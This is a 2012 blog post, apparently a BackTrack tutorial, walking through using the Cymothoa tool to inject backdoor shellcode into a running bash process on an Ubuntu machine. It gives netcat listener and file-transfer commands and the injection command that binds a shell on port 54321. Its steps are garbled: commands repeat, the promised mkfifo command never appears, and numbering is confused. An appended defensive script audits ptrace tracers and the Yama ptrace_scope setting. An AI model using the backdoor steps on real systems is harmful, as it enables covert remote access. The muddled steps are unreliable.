Monday, 30 January 2012

Cymothoa – Inject Shellcode into UBUNTU nc + mkfifo

Cymothoa is a stealth backdooring tool that injects a backdoor's shellcode into an existing process. The tool uses the ptrace library (available on nearly all *nix systems) to manipulate processes and infect them.


1. Before running cymothoa, you must start your Ubuntu machine in VirtualBox.
2. Run nc
root@bt:/pentest/backdoors/cymothoa# nc -l -v -p 54321
3. We must create a FIFO file with mkfifo because it will help us communicate with nc on Ubuntu (the nc version in BT is different from the nc in Ubuntu).
root@bt:/pentest/backdoors/cymothoa# nc -l -v -p 54321



4. root@bt:/pentest/backdoors/cymothoa# nc -l -v -p 54321


3. Now run ls in the BT console.

We can see that BT can access the Ubuntu shell.

4. Now we must send cymothoa to Ubuntu using nc.
Open a new terminal.
    - Copy the cymothoa file from /pentest/backdoors/cymothoa
       root@bt:~# cd /pentest/backdoors/cymothoa/
       root@bt:/pentest/backdoors/cymothoa# cp cymothoa /home/
Create the .tar file:
       root@bt:/home# tar -cvf myfile.tar cymothoa
       root@bt:/home# ls
       cymothoa  myfile.tar  tes
OK, we have the .tar file.
We will send this .tar file to Ubuntu.

root@bt:/home# tar c /home/ | nc -q 10 -l -p 7878
And in the Ubuntu terminal:

root@bt:/home# tar c /home/ | nc -q 10 -l -p 7878
OK, the transfer of the cymothoa file succeeded.
Now open the BT terminal.

5. Extract the .tar file.
After that, run:

./cymothoa



6. ps -aux
Search for the ID of /bin/bash.
We get ID 1326.

7. ./cymothoa -p 1326 -s 0 -y 54321
Ok Success  :D
GOOD LUCK
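
From the defender's side, the ptrace attach this post relies on is visible while it happens and can be restricted in advance. The script below is an added example, not part of the original post or of Cymothoa: it lists processes that currently have a tracer (TracerPid in /proc/<pid>/status) and reports the Yama ptrace_scope setting. The function names, the sample tree and the tracer PID 4242 are constructed; PID 1326 is the one from step 6.

```shell
#!/bin/sh
# Added example: audit ptrace exposure. The proc root is a parameter so the
# functions also run against the constructed tree built below.

# Print "pid name tracerpid" for each process that has a tracer attached.
# Name is the first word of the kernel's comm field.
traced_processes() {
    root=${1:-/proc}
    for status in "$root"/[0-9]*/status; do
        [ -r "$status" ] || continue
        pid=$(basename "$(dirname "$status")")
        awk -v pid="$pid" '
            $1 == "Name:"      { name = $2 }
            $1 == "TracerPid:" { tracer = $2 }
            END { if (tracer + 0 != 0) print pid, name, tracer }
        ' "$status" 2>/dev/null || true
    done
}

# Translate the Yama ptrace_scope sysctl into a short verdict.
ptrace_scope_verdict() {
    f="${1:-/proc}/sys/kernel/yama/ptrace_scope"
    [ -r "$f" ] || { echo "unknown: Yama ptrace_scope not present"; return 0; }
    case "$(cat "$f")" in
        0) echo "weak: same-uid processes may attach to each other" ;;
        1) echo "restricted: attach only to descendants, or with CAP_SYS_PTRACE" ;;
        2) echo "admin-only: attach requires CAP_SYS_PTRACE" ;;
        3) echo "disabled: attach is not permitted" ;;
        *) echo "unknown: unexpected value" ;;
    esac
}

# Constructed sample: bash (PID 1326, as in step 6) traced by a made-up PID 4242.
build_sample_tree() {
    t=$(mktemp -d)
    mkdir -p "$t/1326" "$t/2000" "$t/sys/kernel/yama"
    printf 'Name:\tbash\nState:\tS (sleeping)\nTracerPid:\t4242\n' > "$t/1326/status"
    printf 'Name:\tsshd\nState:\tS (sleeping)\nTracerPid:\t0\n' > "$t/2000/status"
    echo 0 > "$t/sys/kernel/yama/ptrace_scope"
    echo "$t"
}

sample=$(build_sample_tree)
traced_processes "$sample"      # prints: 1326 bash 4242
ptrace_scope_verdict "$sample"
rm -rf "$sample"
```

Called without an argument, both functions read the live /proc. TracerPid is non-zero only while a tracer is attached, so it is a point-in-time check; the ptrace_scope value is the standing control.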
